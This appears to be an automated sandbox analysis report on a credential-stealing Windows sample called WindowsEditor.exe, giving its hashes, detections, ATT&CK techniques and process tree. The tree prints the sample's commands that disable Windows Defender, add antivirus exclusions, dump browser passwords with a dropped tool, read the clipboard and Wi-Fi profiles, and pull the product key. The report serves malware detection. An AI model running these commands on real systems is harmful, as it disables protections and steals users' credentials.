4273aa371116f56c43f5b840ffcf514bf970ca166b593a6884e57478c5da4283

Analysis

max time kernel
82s
max time network
145s
platform
windows10-2004_x64
resource
win10v2004-20221111-en
resource tags

arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
submitted
13-02-2023 11:59

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

WindowsEditor.exe
Size

8.3MB
MD5

a01276baf7cab0051f9a7f6950754022
SHA1

875d179796dc7660b2f016f384958284f2ea0c67
SHA256

4273aa371116f56c43f5b840ffcf514bf970ca166b593a6884e57478c5da4283
SHA512

93a3aa034491c32ba68ebee715b467c5589e325b4c75490f2a5ea41b0d54f562c8b37ab92b17c32f984da336aed617b2e91ca41c90c2558a420933ceef0a9acb
SSDEEP

196608:I3pb7KX/HdN16B6yYnlPzf+JiT4n3XWKsMvtBVYP3hzHK:GYXPwBRYnlPSF3VvvtT4

Score

9^/10

spyware stealer upx

Malware Config

Signatures

NirSoft WebBrowserPassView 2 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral2/memory/3216-272-0x0000000000400000-0x0000000000484000-memory.dmp	WebBrowserPassView
behavioral2/memory/3216-273-0x0000000000400000-0x0000000000484000-memory.dmp	WebBrowserPassView

Nirsoft 2 IoCs

resource	yara_rule
behavioral2/memory/3216-272-0x0000000000400000-0x0000000000484000-memory.dmp	Nirsoft
behavioral2/memory/3216-273-0x0000000000400000-0x0000000000484000-memory.dmp	Nirsoft

Executes dropped EXE 1 IoCs

pid	Process
3216	getPass.exe

Loads dropped DLL 18 IoCs

pid	Process
4652	WindowsEditor.exe
4652	WindowsEditor.exe
4652	WindowsEditor.exe
4652	WindowsEditor.exe
4652	WindowsEditor.exe
4652	WindowsEditor.exe
4652	WindowsEditor.exe
4652	WindowsEditor.exe
4652	WindowsEditor.exe
4652	WindowsEditor.exe
4652	WindowsEditor.exe
4652	WindowsEditor.exe
4652	WindowsEditor.exe
4652	WindowsEditor.exe
4652	WindowsEditor.exe
4652	WindowsEditor.exe
4652	WindowsEditor.exe
4652	WindowsEditor.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000400000001e482-133.dat	upx
behavioral2/files/0x000400000001e482-134.dat	upx
behavioral2/files/0x000400000001629b-138.dat	upx
behavioral2/files/0x000400000001629b-139.dat	upx
behavioral2/files/0x000400000000a3d0-140.dat	upx
behavioral2/files/0x000400000000a3d0-141.dat	upx
behavioral2/memory/4652-142-0x00007FFA97070000-0x00007FFA9765A000-memory.dmp	upx
behavioral2/memory/4652-143-0x00007FFA98A70000-0x00007FFA98A9D000-memory.dmp	upx
behavioral2/memory/4652-144-0x00007FFA9F8A0000-0x00007FFA9F8B9000-memory.dmp	upx
behavioral2/files/0x00080000000162a7-145.dat	upx
behavioral2/files/0x00080000000162a7-146.dat	upx
behavioral2/files/0x000200000001e5a3-147.dat	upx
behavioral2/files/0x000200000001e5a3-148.dat	upx
behavioral2/files/0x000400000001da06-149.dat	upx
behavioral2/files/0x000200000001e2b3-152.dat	upx
behavioral2/files/0x000400000001da06-151.dat	upx
behavioral2/memory/4652-153-0x00007FFAA5E40000-0x00007FFAA5E4D000-memory.dmp	upx
behavioral2/memory/4652-150-0x00007FFA98830000-0x00007FFA98849000-memory.dmp	upx
behavioral2/files/0x000200000001e2b4-154.dat	upx
behavioral2/files/0x000200000001e2b4-156.dat	upx
behavioral2/files/0x000200000001e2b3-155.dat	upx
behavioral2/files/0x0004000000016298-157.dat	upx
behavioral2/files/0x0004000000016298-158.dat	upx
behavioral2/files/0x00050000000162a5-159.dat	upx
behavioral2/files/0x00050000000162a5-160.dat	upx
behavioral2/files/0x000400000001da04-161.dat	upx
behavioral2/files/0x000400000001da04-162.dat	upx
behavioral2/files/0x000200000001e6f0-163.dat	upx
behavioral2/files/0x000200000001e6f0-164.dat	upx
behavioral2/files/0x0003000000000725-165.dat	upx
behavioral2/files/0x0003000000000725-166.dat	upx
behavioral2/files/0x000200000001e7ce-167.dat	upx
behavioral2/files/0x000200000001e7ce-168.dat	upx
behavioral2/files/0x000200000001e5a2-169.dat	upx
behavioral2/files/0x000200000001e5a2-170.dat	upx
behavioral2/memory/4652-174-0x00007FFA97EF0000-0x00007FFA97F1E000-memory.dmp	upx
behavioral2/memory/4652-175-0x00007FFA968C0000-0x00007FFA96C35000-memory.dmp	upx
behavioral2/memory/4652-176-0x00007FFA96C40000-0x00007FFA96CF8000-memory.dmp	upx
behavioral2/memory/4652-178-0x00007FFAA0440000-0x00007FFAA044D000-memory.dmp	upx
behavioral2/memory/4652-177-0x00007FFA97ED0000-0x00007FFA97EE4000-memory.dmp	upx
behavioral2/memory/4652-179-0x00007FFA96890000-0x00007FFA968B3000-memory.dmp	upx
behavioral2/memory/4652-180-0x00007FFA96720000-0x00007FFA9688F000-memory.dmp	upx
behavioral2/memory/4652-184-0x00007FFA96260000-0x00007FFA9628B000-memory.dmp	upx
behavioral2/memory/4652-183-0x00007FFA96290000-0x00007FFA964E0000-memory.dmp	upx
behavioral2/memory/4652-185-0x00007FFA96230000-0x00007FFA9625F000-memory.dmp	upx
behavioral2/files/0x000200000001e6f2-205.dat	upx
behavioral2/files/0x000200000001e6f2-206.dat	upx
behavioral2/memory/4652-207-0x00007FFA96DD0000-0x00007FFA96EEC000-memory.dmp	upx
behavioral2/files/0x0004000000016295-219.dat	upx
behavioral2/files/0x0004000000016295-218.dat	upx
behavioral2/memory/4652-237-0x00007FFA96D30000-0x00007FFA96D73000-memory.dmp	upx
behavioral2/memory/4652-244-0x00007FFA97070000-0x00007FFA9765A000-memory.dmp	upx
behavioral2/memory/4652-245-0x00007FFA98830000-0x00007FFA98849000-memory.dmp	upx
behavioral2/memory/4652-253-0x00007FFA97EF0000-0x00007FFA97F1E000-memory.dmp	upx
behavioral2/memory/4652-254-0x00007FFA968C0000-0x00007FFA96C35000-memory.dmp	upx
behavioral2/memory/4652-255-0x00007FFA96C40000-0x00007FFA96CF8000-memory.dmp	upx
behavioral2/memory/4652-256-0x00007FFA96720000-0x00007FFA9688F000-memory.dmp	upx
behavioral2/memory/4652-257-0x00007FFA96290000-0x00007FFA964E0000-memory.dmp	upx
behavioral2/memory/4652-279-0x00007FFA97070000-0x00007FFA9765A000-memory.dmp	upx
behavioral2/memory/4652-281-0x00007FFA9F8A0000-0x00007FFA9F8B9000-memory.dmp	upx
behavioral2/memory/4652-280-0x00007FFA98A70000-0x00007FFA98A9D000-memory.dmp	upx
behavioral2/memory/4652-282-0x00007FFA97EF0000-0x00007FFA97F1E000-memory.dmp	upx
behavioral2/memory/4652-283-0x00007FFAA5E40000-0x00007FFAA5E4D000-memory.dmp	upx
behavioral2/memory/4652-284-0x00007FFA98830000-0x00007FFA98849000-memory.dmp	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
17	ip-api.com

Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery

T1057

pid	Process
2328	tasklist.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
2768	systeminfo.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 25 IoCs

pid	Process
2992	powershell.exe
2992	powershell.exe
4960	powershell.exe
4960	powershell.exe
208	powershell.exe
208	powershell.exe
4188	powershell.exe
4188	powershell.exe
3468	powershell.exe
3468	powershell.exe
2700	powershell.exe
2700	powershell.exe
1240	powershell.exe
1240	powershell.exe
2700	powershell.exe
1240	powershell.exe
3216	getPass.exe
3216	getPass.exe
2716	powershell.exe
2716	powershell.exe
2716	powershell.exe
3216	getPass.exe
3216	getPass.exe
4468	powershell.exe
4468	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2992	powershell.exe
Token: SeDebugPrivilege	4960	powershell.exe
Token: SeDebugPrivilege	208	powershell.exe
Token: SeDebugPrivilege	4188	powershell.exe
Token: SeDebugPrivilege	3468	powershell.exe
Token: SeDebugPrivilege	2700	powershell.exe
Token: SeDebugPrivilege	2328	tasklist.exe
Token: SeIncreaseQuotaPrivilege	4268	WMIC.exe
Token: SeSecurityPrivilege	4268	WMIC.exe
Token: SeTakeOwnershipPrivilege	4268	WMIC.exe
Token: SeLoadDriverPrivilege	4268	WMIC.exe
Token: SeSystemProfilePrivilege	4268	WMIC.exe
Token: SeSystemtimePrivilege	4268	WMIC.exe
Token: SeProfSingleProcessPrivilege	4268	WMIC.exe
Token: SeIncBasePriorityPrivilege	4268	WMIC.exe
Token: SeCreatePagefilePrivilege	4268	WMIC.exe
Token: SeBackupPrivilege	4268	WMIC.exe
Token: SeRestorePrivilege	4268	WMIC.exe
Token: SeShutdownPrivilege	4268	WMIC.exe
Token: SeDebugPrivilege	4268	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4268	WMIC.exe
Token: SeRemoteShutdownPrivilege	4268	WMIC.exe
Token: SeUndockPrivilege	4268	WMIC.exe
Token: SeManageVolumePrivilege	4268	WMIC.exe
Token: 33	4268	WMIC.exe
Token: 34	4268	WMIC.exe
Token: 35	4268	WMIC.exe
Token: 36	4268	WMIC.exe
Token: SeIncreaseQuotaPrivilege	176	WMIC.exe
Token: SeSecurityPrivilege	176	WMIC.exe
Token: SeTakeOwnershipPrivilege	176	WMIC.exe
Token: SeLoadDriverPrivilege	176	WMIC.exe
Token: SeSystemProfilePrivilege	176	WMIC.exe
Token: SeSystemtimePrivilege	176	WMIC.exe
Token: SeProfSingleProcessPrivilege	176	WMIC.exe
Token: SeIncBasePriorityPrivilege	176	WMIC.exe
Token: SeCreatePagefilePrivilege	176	WMIC.exe
Token: SeBackupPrivilege	176	WMIC.exe
Token: SeRestorePrivilege	176	WMIC.exe
Token: SeShutdownPrivilege	176	WMIC.exe
Token: SeDebugPrivilege	176	WMIC.exe
Token: SeSystemEnvironmentPrivilege	176	WMIC.exe
Token: SeRemoteShutdownPrivilege	176	WMIC.exe
Token: SeUndockPrivilege	176	WMIC.exe
Token: SeManageVolumePrivilege	176	WMIC.exe
Token: 33	176	WMIC.exe
Token: 34	176	WMIC.exe
Token: 35	176	WMIC.exe
Token: 36	176	WMIC.exe
Token: SeDebugPrivilege	1240	powershell.exe
Token: SeIncreaseQuotaPrivilege	176	WMIC.exe
Token: SeSecurityPrivilege	176	WMIC.exe
Token: SeTakeOwnershipPrivilege	176	WMIC.exe
Token: SeLoadDriverPrivilege	176	WMIC.exe
Token: SeSystemProfilePrivilege	176	WMIC.exe
Token: SeSystemtimePrivilege	176	WMIC.exe
Token: SeProfSingleProcessPrivilege	176	WMIC.exe
Token: SeIncBasePriorityPrivilege	176	WMIC.exe
Token: SeCreatePagefilePrivilege	176	WMIC.exe
Token: SeBackupPrivilege	176	WMIC.exe
Token: SeRestorePrivilege	176	WMIC.exe
Token: SeShutdownPrivilege	176	WMIC.exe
Token: SeDebugPrivilege	176	WMIC.exe
Token: SeSystemEnvironmentPrivilege	176	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4684 wrote to memory of 4652	4684	WindowsEditor.exe	81
PID 4684 wrote to memory of 4652	4684	WindowsEditor.exe	81
PID 4652 wrote to memory of 3912	4652	WindowsEditor.exe	85
PID 4652 wrote to memory of 3912	4652	WindowsEditor.exe	85
PID 4652 wrote to memory of 836	4652	WindowsEditor.exe	82
PID 4652 wrote to memory of 836	4652	WindowsEditor.exe	82
PID 836 wrote to memory of 1996	836	cmd.exe	88
PID 836 wrote to memory of 1996	836	cmd.exe	88
PID 3912 wrote to memory of 2992	3912	cmd.exe	86
PID 3912 wrote to memory of 2992	3912	cmd.exe	86
PID 1996 wrote to memory of 1576	1996	net.exe	87
PID 1996 wrote to memory of 1576	1996	net.exe	87
PID 4652 wrote to memory of 1172	4652	WindowsEditor.exe	90
PID 4652 wrote to memory of 1172	4652	WindowsEditor.exe	90
PID 4652 wrote to memory of 1828	4652	WindowsEditor.exe	89
PID 4652 wrote to memory of 1828	4652	WindowsEditor.exe	89
PID 1828 wrote to memory of 4960	1828	cmd.exe	93
PID 1828 wrote to memory of 4960	1828	cmd.exe	93
PID 1172 wrote to memory of 208	1172	cmd.exe	94
PID 1172 wrote to memory of 208	1172	cmd.exe	94
PID 4652 wrote to memory of 3636	4652	WindowsEditor.exe	95
PID 4652 wrote to memory of 3636	4652	WindowsEditor.exe	95
PID 3636 wrote to memory of 4188	3636	cmd.exe	97
PID 3636 wrote to memory of 4188	3636	cmd.exe	97
PID 4652 wrote to memory of 4200	4652	WindowsEditor.exe	100
PID 4652 wrote to memory of 4200	4652	WindowsEditor.exe	100
PID 4200 wrote to memory of 3468	4200	cmd.exe	103
PID 4200 wrote to memory of 3468	4200	cmd.exe	103
PID 4652 wrote to memory of 3284	4652	WindowsEditor.exe	104
PID 4652 wrote to memory of 3284	4652	WindowsEditor.exe	104
PID 4652 wrote to memory of 4756	4652	WindowsEditor.exe	105
PID 4652 wrote to memory of 4756	4652	WindowsEditor.exe	105
PID 4652 wrote to memory of 4120	4652	WindowsEditor.exe	113
PID 4652 wrote to memory of 4120	4652	WindowsEditor.exe	113
PID 4652 wrote to memory of 5100	4652	WindowsEditor.exe	107
PID 4652 wrote to memory of 5100	4652	WindowsEditor.exe	107
PID 4652 wrote to memory of 1888	4652	WindowsEditor.exe	151
PID 4652 wrote to memory of 1888	4652	WindowsEditor.exe	151
PID 4652 wrote to memory of 536	4652	WindowsEditor.exe	114
PID 4652 wrote to memory of 536	4652	WindowsEditor.exe	114
PID 4652 wrote to memory of 4416	4652	WindowsEditor.exe	115
PID 4652 wrote to memory of 4416	4652	WindowsEditor.exe	115
PID 4652 wrote to memory of 4048	4652	WindowsEditor.exe	118
PID 4652 wrote to memory of 4048	4652	WindowsEditor.exe	118
PID 4652 wrote to memory of 3424	4652	WindowsEditor.exe	117
PID 4652 wrote to memory of 3424	4652	WindowsEditor.exe	117
PID 3284 wrote to memory of 2700	3284	cmd.exe	121
PID 3284 wrote to memory of 2700	3284	cmd.exe	121
PID 4756 wrote to memory of 4968	4756	cmd.exe	124
PID 4756 wrote to memory of 4968	4756	cmd.exe	124
PID 4120 wrote to memory of 3412	4120	cmd.exe	123
PID 4120 wrote to memory of 3412	4120	cmd.exe	123
PID 4416 wrote to memory of 2328	4416	cmd.exe	126
PID 4416 wrote to memory of 2328	4416	cmd.exe	126
PID 5100 wrote to memory of 1240	5100	cmd.exe	125
PID 5100 wrote to memory of 1240	5100	cmd.exe	125
PID 3424 wrote to memory of 4268	3424	cmd.exe	130
PID 3424 wrote to memory of 4268	3424	cmd.exe	130
PID 536 wrote to memory of 176	536	cmd.exe	127
PID 536 wrote to memory of 176	536	cmd.exe	127
PID 4652 wrote to memory of 236	4652	WindowsEditor.exe	129
PID 4652 wrote to memory of 236	4652	WindowsEditor.exe	129
PID 4652 wrote to memory of 2268	4652	WindowsEditor.exe	128
PID 4652 wrote to memory of 2268	4652	WindowsEditor.exe	128

C:\Users\Admin\AppData\Local\Temp\WindowsEditor.exe
"C:\Users\Admin\AppData\Local\Temp\WindowsEditor.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4684
- C:\Users\Admin\AppData\Local\Temp\WindowsEditor.exe
  "C:\Users\Admin\AppData\Local\Temp\WindowsEditor.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:4652
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "net session"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:836
  - - C:\Windows\system32\net.exe
      net session
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1996
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Unblock-File '.\WindowsEditor.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3912
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Unblock-File '.\WindowsEditor.exe'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2992
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1828
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4960
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\WindowsEditor.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1172
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\WindowsEditor.exe'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:208
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\_MEI46842'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3636
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\_MEI46842'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4188
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‌.scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4200
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‌.scr'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3468
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Unblock-File '.\getPass'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3284
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Unblock-File '.\getPass'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2700
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4756
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      PID:4968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5100
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1240
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "dir leveldb /AD /s /b"
    3⤵
    PID:1888
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4120
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3412
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:536
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:176
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4416
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2328
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3424
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4268
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:4048
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:2768
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "dir leveldb /AD /s /b"
    3⤵
    PID:2268
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "where /r . *.sqlite"
    3⤵
    PID:236
  - - C:\Windows\system32\where.exe
      where /r . *.sqlite
      4⤵
      PID:4316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4056
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1636
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3340
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:4336
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:3888
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3692
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1528
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:4868
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:1696
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getPass.exe /stext pass.txt"
    3⤵
    PID:1888
  - - C:\Users\Admin\AppData\Local\Temp\_MEI46842\getPass.exe
      getPass.exe /stext pass.txt
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      PID:3216
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4780
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1296
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:4428
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2716
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:2720
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      PID:1084
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:2644
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4468

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
1⤵
PID:1576

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Process Discovery

T1057

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
a2b24af1492f112d2e53cb7415fda39f

SHA1
dbfcee57242a14b60997bd03379cc60198976d85

SHA256
fa05674c1db3386cf01ba1db5a3e9aeb97e15d1720d82988f573bf9743adc073

SHA512
9919077b8e5c7a955682e9a83f6d7ab34ac6a10a3d65af172734d753a48f7604a95739933b8680289c94b4e271b27c775d015b8d9678db277f498d8450b8aff0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
c3830fcbc3238616802fb25c57cc41b4

SHA1
9654cf10dea827ac5a6c0a87daf4203625d53351

SHA256
dc2d85b36410ce07035bb52496017d0acf90bc49d2084196be3e2bcaf49f9a0b

SHA512
9bb488ccb739b5a194513a6ebf8f8f3cc6636901a0fbb29a8bddb96fb50bb83efa46f0abd79929a5e05feecadf62f62695297e74d8b559766f835af70a85f3af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
c3830fcbc3238616802fb25c57cc41b4

SHA1
9654cf10dea827ac5a6c0a87daf4203625d53351

SHA256
dc2d85b36410ce07035bb52496017d0acf90bc49d2084196be3e2bcaf49f9a0b

SHA512
9bb488ccb739b5a194513a6ebf8f8f3cc6636901a0fbb29a8bddb96fb50bb83efa46f0abd79929a5e05feecadf62f62695297e74d8b559766f835af70a85f3af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
3db1c0d23daacf01eb99125ccc2787d3

SHA1
0849528de1ba411279231d635d8f39d54cc829d2

SHA256
bceb96f5c3d31447980eb8cd891bba75b3e5b6eb60abf4d829fc13cd8faf2582

SHA512
3d84635a3395bca1d91ce182ccfb9e38c8da87ad678704673a72d580e4251cedc5a6b2a89040a172a5687b67952e74a13673bd115bce7bdabaed06f89323de5b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
e5663972c1caaba7088048911c758bf3

SHA1
3462dea0f9c2c16a9c3afdaef8bbb1f753c1c198

SHA256
9f7f29a4696876cadca3f14d7e43f9ede0c97fd64be3f5d94bda49a91b6a419e

SHA512
ff4e72c46cf083de62baa2ce2661555dd91b5f144294015f7b262fd4500cb67fe80e1871a82da63b607e3e9cef401f4b73c587bf1134637881ecad51aad1eddc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
2ed738b5a133397ceaa850e1c0770a2c

SHA1
8a27df10998b73d55cadf7574a647e34a76ba170

SHA256
1c79d02d93acefc34f2e4c9cec668c46327b7a81217cf82f7fea414927acdb8f

SHA512
9cf68a62399700bba332aed2bf25ad11366becaaf7c7e67a69872204da93662bda7734e3c3c3322738e43bca08596c561607ed0a2b64dd4eb031e812aae3b5e3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
2ed738b5a133397ceaa850e1c0770a2c

SHA1
8a27df10998b73d55cadf7574a647e34a76ba170

SHA256
1c79d02d93acefc34f2e4c9cec668c46327b7a81217cf82f7fea414927acdb8f

SHA512
9cf68a62399700bba332aed2bf25ad11366becaaf7c7e67a69872204da93662bda7734e3c3c3322738e43bca08596c561607ed0a2b64dd4eb031e812aae3b5e3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
